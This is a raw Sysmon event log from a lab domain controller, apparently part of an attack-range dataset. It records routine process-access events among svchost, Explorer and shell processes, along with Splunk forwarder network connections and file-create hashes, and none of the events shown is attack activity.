12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x800000000000000010547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:46.570{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53702-false10.0.1.12-8000- 23542300x800000000000000010587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:49.148{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65BA592D88431A0B80EC7E96493E72F0,SHA256=599619298A75A3532E010C18104850ED8DED85595DA4B9E9B7915F71CF5B767D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:49.304{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53703-false10.0.1.12-8089- 23542300x800000000000000010588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:50.195{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C8FEAC36D7DD6DF4F170DA88002B2B3,SHA256=21F1B892FFB5D99A7BE04BFAE4F1E17DC4530798FF7FC356FD2B8CDA77D90AF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:51.210{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7047CD5C7BFF7CE59C36DAB01EBB185A,SHA256=236A1B37014F2C3BF9D140B819261E6051A102743103DAA2F70A9C685E11420F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:52.241{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE81F85561F7DBA15056C78101A2C0BB,SHA256=A542A26AA95F2DEB2FDBE633C9A1ED89261C0ADD91564463ED234331325F815B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:52.460{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53704-false10.0.1.12-8000- 23542300x800000000000000010592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:53.319{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D11FCE774DBD6FC157B66255E2E6BFD1,SHA256=55AB576DC3AD4B623CEBC2268A46E86A105602F1B89858D02CE3109AAA5F4D4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:54.413{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D65DE6D570BBCB5F1A789B48376CBBF8,SHA256=AFDC14012EDAF3956B4836CD5875EC86A8CF8AAA83D407873706A773674708B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:55.507{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20CC58A9924DC8865692482D84164EC4,SHA256=75C97AC54E3BB5E119B132701333C82320C3CF30646E84B3DEFF79154576DDED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:56.538{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67E4CB02FC5EA81A233A1223CFDAC7FC,SHA256=481BB09794D16F45C45176075895233B33361B71DA5F9CB3AE00E5DECF52C546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:57.538{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A9AB009B92EB9F41B7D11F76C44E027,SHA256=682A854DC8EDCD1C3A4AAFEEC407E991CB25B7A7FBE3809748DBB1A9631D3F7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:57.601{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53705-false10.0.1.12-8000- 23542300x800000000000000010598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:58.553{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11311DDD19F63F8FD644B91DD4DB1F51,SHA256=4011A4BAD26D7E19B0467A23ECB5DEDEFA71BC683AC72B39532A27DF57764752,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:59.631{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCD882E217844A41AADC0929249C11DF,SHA256=0E88DDD52C92A3543042B5EC5D67575E7DB70A8878FE041ECAC5F41369575B67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:00.694{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26DD9BA3F2B9C01643DD61C42194B5B7,SHA256=EFF63370A899326EFBB2FE7B674A398E006D9CD61062F12E02D70ED5B7AA1CE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:01.709{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06CD37961BBC4D11002A59E7122DC8FF,SHA256=2243A486CBFBCFF270116C0FA6159B296A0B4E1EF37314A7EF173BB6651FBBAD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.943{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-665E-6064-6801-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:02.943{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 